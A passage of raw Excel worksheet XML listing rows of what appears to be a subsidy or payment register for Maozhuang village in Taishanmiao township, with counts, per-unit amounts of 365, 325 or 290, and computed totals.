        <v>0</v>
      </c>
      <c r="J2202" s="24"/>
      <c r="K2202" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2203" customHeight="1" spans="1:11">
      <c r="A2203" s="23" t="s">
        <v>5805</v>
      </c>
      <c r="B2203" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2203" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2203" s="24" t="s">
        <v>5806</v>
      </c>
      <c r="E2203" s="24" t="s">
        <v>5453</v>
      </c>
      <c r="F2203" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2203" s="24">
        <v>1</v>
      </c>
      <c r="H2203" s="25">
        <v>365</v>
      </c>
      <c r="I2203" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2203" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2203" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2204" customHeight="1" spans="1:11">
      <c r="A2204" s="23" t="s">
        <v>5807</v>
      </c>
      <c r="B2204" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2204" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2204" s="24" t="s">
        <v>5808</v>
      </c>
      <c r="E2204" s="24" t="s">
        <v>5649</v>
      </c>
      <c r="F2204" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2204" s="24">
        <v>2</v>
      </c>
      <c r="H2204" s="25">
        <v>325</v>
      </c>
      <c r="I2204" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2204" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2204" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2205" customHeight="1" spans="1:11">
      <c r="A2205" s="23" t="s">
        <v>5809</v>
      </c>
      <c r="B2205" s="24" t="str">
        <f>B2204</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2205" s="24" t="str">
        <f>C2204</f>
        <v>毛庄村</v>
      </c>
      <c r="D2205" s="23" t="s">
        <v>5810</v>
      </c>
      <c r="E2205" s="23" t="s">
        <v>5397</v>
      </c>
      <c r="F2205" s="24">
        <f>F2204</f>
        <v>4113210704</v>
      </c>
      <c r="G2205" s="24"/>
      <c r="H2205" s="24"/>
      <c r="I2205" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2205" s="24"/>
      <c r="K2205" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2206" customHeight="1" spans="1:11">
      <c r="A2206" s="23" t="s">
        <v>5811</v>
      </c>
      <c r="B2206" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2206" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2206" s="24" t="s">
        <v>2714</v>
      </c>
      <c r="E2206" s="24" t="s">
        <v>5374</v>
      </c>
      <c r="F2206" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2206" s="24">
        <v>1</v>
      </c>
      <c r="H2206" s="25">
        <v>365</v>
      </c>
      <c r="I2206" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2206" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2206" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2207" customHeight="1" spans="1:11">
      <c r="A2207" s="23" t="s">
        <v>5812</v>
      </c>
      <c r="B2207" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2207" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2207" s="24" t="s">
        <v>5813</v>
      </c>
      <c r="E2207" s="24" t="s">
        <v>5814</v>
      </c>
      <c r="F2207" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2207" s="24">
        <v>1</v>
      </c>
      <c r="H2207" s="25">
        <v>365</v>
      </c>
      <c r="I2207" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2207" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2207" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2208" customHeight="1" spans="1:11">
      <c r="A2208" s="23" t="s">
        <v>5815</v>
      </c>
      <c r="B2208" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2208" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2208" s="24" t="s">
        <v>661</v>
      </c>
      <c r="E2208" s="24" t="s">
        <v>5476</v>
      </c>
      <c r="F2208" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2208" s="24">
        <v>1</v>
      </c>
      <c r="H2208" s="25">
        <v>365</v>
      </c>
      <c r="I2208" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2208" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2208" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2209" customHeight="1" spans="1:11">
      <c r="A2209" s="23" t="s">
        <v>5816</v>
      </c>
      <c r="B2209" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2209" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2209" s="24" t="s">
        <v>5817</v>
      </c>
      <c r="E2209" s="24" t="s">
        <v>5473</v>
      </c>
      <c r="F2209" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2209" s="24">
        <v>1</v>
      </c>
      <c r="H2209" s="25">
        <v>365</v>
      </c>
      <c r="I2209" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2209" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2209" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2210" customHeight="1" spans="1:11">
      <c r="A2210" s="23" t="s">
        <v>5818</v>
      </c>
      <c r="B2210" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2210" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2210" s="24" t="s">
        <v>5819</v>
      </c>
      <c r="E2210" s="24" t="s">
        <v>3510</v>
      </c>
      <c r="F2210" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2210" s="24">
        <v>2</v>
      </c>
      <c r="H2210" s="25">
        <v>325</v>
      </c>
      <c r="I2210" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2210" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2210" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2211" customHeight="1" spans="1:11">
      <c r="A2211" s="23" t="s">
        <v>5820</v>
      </c>
      <c r="B2211" s="24" t="str">
        <f>B2210</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2211" s="24" t="str">
        <f>C2210</f>
        <v>毛庄村</v>
      </c>
      <c r="D2211" s="23" t="s">
        <v>5821</v>
      </c>
      <c r="E2211" s="23" t="s">
        <v>5015</v>
      </c>
      <c r="F2211" s="24">
        <f>F2210</f>
        <v>4113210704</v>
      </c>
      <c r="G2211" s="24"/>
      <c r="H2211" s="24"/>
      <c r="I2211" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2211" s="24"/>
      <c r="K2211" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2212" customHeight="1" spans="1:11">
      <c r="A2212" s="23" t="s">
        <v>5822</v>
      </c>
      <c r="B2212" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2212" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2212" s="24" t="s">
        <v>5823</v>
      </c>
      <c r="E2212" s="24" t="s">
        <v>4359</v>
      </c>
      <c r="F2212" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2212" s="24">
        <v>2</v>
      </c>
      <c r="H2212" s="25">
        <v>325</v>
      </c>
      <c r="I2212" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2212" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2212" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2213" customHeight="1" spans="1:11">
      <c r="A2213" s="23" t="s">
        <v>5824</v>
      </c>
      <c r="B2213" s="24" t="str">
        <f>B2212</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2213" s="24" t="str">
        <f>C2212</f>
        <v>毛庄村</v>
      </c>
      <c r="D2213" s="23" t="s">
        <v>5825</v>
      </c>
      <c r="E2213" s="32" t="s">
        <v>5432</v>
      </c>
      <c r="F2213" s="24">
        <f>F2212</f>
        <v>4113210704</v>
      </c>
      <c r="G2213" s="24"/>
      <c r="H2213" s="24"/>
      <c r="I2213" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2213" s="24"/>
      <c r="K2213" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2214" customHeight="1" spans="1:11">
      <c r="A2214" s="23" t="s">
        <v>5826</v>
      </c>
      <c r="B2214" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2214" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2214" s="24" t="s">
        <v>5827</v>
      </c>
      <c r="E2214" s="24" t="s">
        <v>5828</v>
      </c>
      <c r="F2214" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2214" s="24">
        <v>2</v>
      </c>
      <c r="H2214" s="25">
        <v>325</v>
      </c>
      <c r="I2214" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2214" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2214" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2215" customHeight="1" spans="1:11">
      <c r="A2215" s="23" t="s">
        <v>5829</v>
      </c>
      <c r="B2215" s="24" t="str">
        <f>B2214</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2215" s="24" t="str">
        <f>C2214</f>
        <v>毛庄村</v>
      </c>
      <c r="D2215" s="23" t="s">
        <v>5830</v>
      </c>
      <c r="E2215" s="24" t="s">
        <v>5831</v>
      </c>
      <c r="F2215" s="24">
        <f>F2214</f>
        <v>4113210704</v>
      </c>
      <c r="G2215" s="24"/>
      <c r="H2215" s="24"/>
      <c r="I2215" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2215" s="24"/>
      <c r="K2215" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2216" customHeight="1" spans="1:11">
      <c r="A2216" s="23" t="s">
        <v>5832</v>
      </c>
      <c r="B2216" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2216" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2216" s="24" t="s">
        <v>5833</v>
      </c>
      <c r="E2216" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F2216" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2216" s="24">
        <v>3</v>
      </c>
      <c r="H2216" s="25">
        <v>290</v>
      </c>
      <c r="I2216" s="24">
        <f t="shared" si="34"/>
        <v>870</v>
      </c>
      <c r="J2216" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2216" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2217" customHeight="1" spans="1:11">
      <c r="A2217" s="23" t="s">
        <v>5834</v>
      </c>
      <c r="B2217" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2217" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2217" s="86" t="s">
        <v>5835</v>
      </c>
      <c r="E2217" s="86" t="s">
        <v>5836</v>
      </c>
      <c r="F2217" s="87">
        <v>4113210704</v>
      </c>
      <c r="G2217" s="86"/>
      <c r="H2217" s="86"/>
      <c r="I2217" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2217" s="86" t="s">
        <v>5837</v>
      </c>
      <c r="K2217" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2218" customHeight="1" spans="1:11">
      <c r="A2218" s="23" t="s">
        <v>5838</v>
      </c>
      <c r="B2218" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2218" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2218" s="23" t="s">
        <v>5839</v>
      </c>
      <c r="E2218" s="23" t="s">
        <v>5840</v>
      </c>
      <c r="F2218" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2218" s="23"/>
      <c r="H2218" s="23"/>
      <c r="I2218" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2218" s="86" t="s">
        <v>5837</v>
      </c>
      <c r="K2218" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2219" customHeight="1" spans="1:11">
      <c r="A2219" s="23" t="s">
        <v>5841</v>
      </c>
      <c r="B2219" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2219" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2219" s="24" t="s">
        <v>5842</v>
      </c>
      <c r="E2219" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2219" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2219" s="24">
        <v>1</v>
      </c>
      <c r="H2219" s="25">
        <v>365</v>
      </c>
      <c r="I2219" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2219" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2219" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2220" customHeight="1" spans="1:11">
      <c r="A2220" s="23" t="s">
        <v>5843</v>
      </c>
      <c r="B2220" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2220" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2220" s="24" t="s">
        <v>5844</v>
      </c>
      <c r="E2220" s="24" t="s">
        <v>5845</v>
      </c>
      <c r="F2220" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2220" s="24">
        <v>1</v>
      </c>
      <c r="H2220" s="25">
        <v>365</v>
      </c>
      <c r="I2220" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2220" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2220" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2221" customHeight="1" spans="1:11">
      <c r="A2221" s="23" t="s">
        <v>5846</v>
      </c>
      <c r="B2221" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2221" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2221" s="24" t="s">
        <v>5847</v>
      </c>
      <c r="E2221" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2221" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2221" s="24">
        <v>1</v>
      </c>
      <c r="H2221" s="25">
        <v>365</v>
      </c>
      <c r="I2221" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2221" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2221" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2222" customHeight="1" spans="1:11">
      <c r="A2222" s="23" t="s">
        <v>5848</v>
      </c>
      <c r="B2222" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2222" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2222" s="24" t="s">
        <v>5849</v>
      </c>
      <c r="E2222" s="24" t="s">
        <v>5850</v>
      </c>
      <c r="F2222" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2222" s="24">
        <v>1</v>
      </c>
      <c r="H2222" s="25">
        <v>365</v>
      </c>
      <c r="I2222" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2222" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2222" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2223" customHeight="1" spans="1:11">
      <c r="A2223" s="23" t="s">
        <v>5851</v>
      </c>
      <c r="B2223" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2223" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2223" s="24" t="s">
        <v>5852</v>
      </c>
      <c r="E2223" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2223" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2223" s="24">
        <v>1</v>
      </c>
      <c r="H2223" s="25">
        <v>365</v>
      </c>
      <c r="I2223" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2223" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2223" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2224" customHeight="1" spans="1:11">
      <c r="A2224" s="23" t="s">
        <v>5853</v>
      </c>
      <c r="B2224" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2224" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2224" s="24" t="s">
        <v>5854</v>
      </c>
      <c r="E2224" s="24" t="s">
        <v>5855</v>
      </c>
      <c r="F2224" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2224" s="24">
        <v>2</v>
      </c>
      <c r="H2224" s="25">
        <v>325</v>
      </c>
      <c r="I2224" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2224" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2224" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2225" customHeight="1" spans="1:11">
      <c r="A2225" s="23" t="s">
        <v>5856</v>
      </c>
      <c r="B2225" s="24" t="str">
        <f>B2224</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2225" s="24" t="str">
        <f>C2224</f>
        <v>毛庄村</v>
      </c>
      <c r="D2225" s="23" t="s">
        <v>5857</v>
      </c>
      <c r="E2225" s="24" t="s">
        <v>5400</v>
      </c>
      <c r="F2225" s="24">
        <f>F2224</f>
        <v>4113210704</v>
      </c>
      <c r="G2225" s="24"/>
      <c r="H2225" s="24"/>
      <c r="I2225" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2225" s="24"/>
      <c r="K2225" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2226" customHeight="1" spans="1:11">
      <c r="A2226" s="23" t="s">
        <v>5858</v>
      </c>
      <c r="B2226" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2226" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2226" s="24" t="s">
        <v>5859</v>
      </c>
      <c r="E2226" s="24" t="s">
        <v>5438</v>
      </c>
      <c r="F2226" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2226" s="24">
        <v>1</v>
      </c>
      <c r="H2226" s="25">
        <v>365</v>
      </c>
      <c r="I2226" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2226" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2226" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2227" customHeight="1" spans="1:11">
      <c r="A2227" s="23" t="s">
        <v>5860</v>
      </c>
      <c r="B2227" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2227" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2227" s="24" t="s">
        <v>5861</v>
      </c>
      <c r="E2227" s="24" t="s">
        <v>3510</v>
      </c>
      <c r="F2227" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2227" s="24">
        <v>1</v>
      </c>
      <c r="H2227" s="25">
        <v>365</v>
      </c>
      <c r="I2227" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2227" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2227" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2228" customHeight="1" spans="1:11">
      <c r="A2228" s="23" t="s">
        <v>5862</v>
      </c>
      <c r="B2228" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2228" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2228" s="24" t="s">
        <v>5863</v>
      </c>
      <c r="E2228" s="24" t="s">
        <v>2233</v>
      </c>
      <c r="F2228" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2228" s="24">
        <v>1</v>
      </c>
      <c r="H2228" s="25">
        <v>365</v>
      </c>
      <c r="I2228" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2228" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2228" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2229" customHeight="1" spans="1:11">
      <c r="A2229" s="23" t="s">
        <v>5864</v>
      </c>
      <c r="B2229" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2229" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2229" s="24" t="s">
        <v>5865</v>
      </c>
      <c r="E2229" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2229" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2229" s="24">
        <v>1</v>
      </c>
      <c r="H2229" s="25">
        <v>365</v>
      </c>
      <c r="I2229" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2229" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2229" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2230" customHeight="1" spans="1:11">
      <c r="A2230" s="23" t="s">
        <v>5866</v>
      </c>
      <c r="B2230" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2230" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2230" s="24" t="s">
        <v>5867</v>
      </c>
      <c r="E2230" s="24" t="s">
        <v>5385</v>
      </c>
      <c r="F2230" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2230" s="24">
        <v>1</v>
      </c>
      <c r="H2230" s="25">
        <v>365</v>
      </c>
      <c r="I2230" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2230" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2230" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2231" customHeight="1" spans="1:11">
      <c r="A2231" s="23" t="s">
        <v>5868</v>
      </c>
      <c r="B2231" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2231" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2231" s="24" t="s">
        <v>5869</v>
      </c>
      <c r="E2231" s="24" t="s">
        <v>5585</v>
      </c>
      <c r="F2231" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2231" s="24">
        <v>1</v>
      </c>
      <c r="H2231" s="25">
        <v>365</v>
      </c>
      <c r="I2231" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2231" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2231" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2232" customHeight="1" spans="1:11">
      <c r="A2232" s="23" t="s">
        <v>5870</v>
      </c>
      <c r="B2232" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2232" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2232" s="24" t="s">
        <v>5871</v>
      </c>
      <c r="E2232" s="24" t="s">
        <v>5649</v>
      </c>
      <c r="F2232" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2232" s="24">
        <v>1</v>
      </c>
      <c r="H2232" s="25">
        <v>365</v>
      </c>
      <c r="I2232" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2232" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2232" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2233" customHeight="1" spans="1:11">
      <c r="A2233" s="23" t="s">
        <v>5872</v>
      </c>
      <c r="B2233" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2233" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2233" s="24" t="s">
        <v>5873</v>
      </c>
      <c r="E2233" s="24" t="s">
        <v>5514</v>
      </c>
      <c r="F2233" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2233" s="24">
        <v>1</v>
      </c>
      <c r="H2233" s="25">
        <v>365</v>
      </c>
      <c r="I2233" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2233" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2233" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2234" customHeight="1" spans="1:11">
      <c r="A2234" s="23" t="s">
        <v>5874</v>
      </c>
      <c r="B2234" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2234" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2234" s="24" t="s">
        <v>5875</v>
      </c>
      <c r="E2234" s="24" t="s">
        <v>5473</v>
      </c>
      <c r="F2234" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2234" s="24">
        <v>1</v>
      </c>
      <c r="H2234" s="25">
        <v>365</v>
      </c>
      <c r="I2234" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2234" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2234" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2235" customHeight="1" spans="1:11">
      <c r="A2235" s="23" t="s">
        <v>5876</v>
      </c>
      <c r="B2235" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2235" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2235" s="24" t="s">
        <v>5877</v>
      </c>
      <c r="E2235" s="24" t="s">
        <v>5850</v>
      </c>
      <c r="F2235" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2235" s="24">
        <v>1</v>
      </c>
      <c r="H2235" s="25">
        <v>365</v>
      </c>
      <c r="I2235" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2235" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2235" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2236" customHeight="1" spans="1:11">
      <c r="A2236" s="23" t="s">
        <v>5878</v>
      </c>
      <c r="B2236" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2236" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2236" s="24" t="s">
        <v>5879</v>
      </c>
      <c r="E2236" s="24" t="s">
        <v>5880</v>
      </c>
      <c r="F2236" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2236" s="24">
        <v>1</v>
      </c>
      <c r="H2236" s="25">
        <v>365</v>
      </c>
      <c r="I2236" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2236" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2236" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2237" customHeight="1" spans="1:11">
      <c r="A2237" s="23" t="s">
        <v>5881</v>
      </c>
      <c r="B2237" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2237" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2237" s="24" t="s">
        <v>5882</v>
      </c>
      <c r="E2237" s="24" t="s">
        <v>5883</v>
      </c>
      <c r="F2237" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2237" s="24">
        <v>1</v>
      </c>
      <c r="H2237" s="25">
        <v>365</v>
      </c>
      <c r="I2237" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2237" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2237" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2238" customHeight="1" spans="1:11">
      <c r="A2238" s="23" t="s">
        <v>5884</v>
      </c>
      <c r="B2238" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2238" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2238" s="24" t="s">
        <v>5885</v>
      </c>
      <c r="E2238" s="24" t="s">
        <v>5886</v>
      </c>
      <c r="F2238" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2238" s="24">
        <v>1</v>
      </c>
      <c r="H2238" s="25">
        <v>365</v>
      </c>
      <c r="I2238" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2238" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2238" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2239" customHeight="1" spans="1:11">
      <c r="A2239" s="23" t="s">
        <v>5887</v>
      </c>
      <c r="B2239" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2239" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2239" s="24" t="s">
        <v>5888</v>
      </c>
      <c r="E2239" s="24" t="s">
        <v>5889</v>
      </c>
      <c r="F2239" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2239" s="24">
        <v>1</v>
      </c>
      <c r="H2239" s="25">
        <v>365</v>
      </c>
      <c r="I2239" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2239" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2239" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2240" customHeight="1" spans="1:11">
      <c r="A2240" s="23" t="s">
        <v>5890</v>
      </c>
      <c r="B2240" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2240" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2240" s="24" t="s">
        <v>5891</v>
      </c>
      <c r="E2240" s="24" t="s">
        <v>5403</v>
      </c>
      <c r="F2240" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2240" s="24">
        <v>1</v>
      </c>
      <c r="H2240" s="25">
        <v>365</v>
      </c>
      <c r="I2240" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2240" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2240" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2241" customHeight="1" spans="1:11">
      <c r="A2241" s="23" t="s">
        <v>5893</v>
      </c>
      <c r="B2241" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2241" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2241" s="24" t="s">
        <v>5894</v>
      </c>
      <c r="E2241" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2241" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2241" s="24">
        <v>2</v>
      </c>
      <c r="H2241" s="25">
        <v>325</v>
